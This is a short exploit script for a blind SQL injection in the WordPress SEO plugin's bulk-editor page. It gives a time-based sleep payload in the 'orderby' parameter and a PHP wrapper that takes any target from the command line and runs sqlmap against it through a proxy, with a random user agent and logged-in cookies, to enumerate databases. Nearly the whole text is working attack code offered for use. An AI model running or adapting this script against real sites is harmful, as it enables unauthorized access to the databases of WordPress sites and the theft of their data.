[+] SQL vulnerability in WordPress SEO - Blind SQL
$target = "_TARGET_";
$exploit = "/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc";
[+] Using SQLMap:
<?php
set_time_limit(0);
echo "[+] MINI exploit-SQLMAP / SQL vulnerability in WordPress SEO - Blind SQL\n";
$target = isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n");
$command = "python ../sqlmap/sqlmap.py -u '{$target}/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc' --batch --dbms=MySQL --cookie='wordpress_9d...; wordpress_logged_in_9dee67...;' --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --technique=B --eta --answers='follow=N' --dbs";
system($command, $dados).empty($dados[0]) ? exit() : NULL;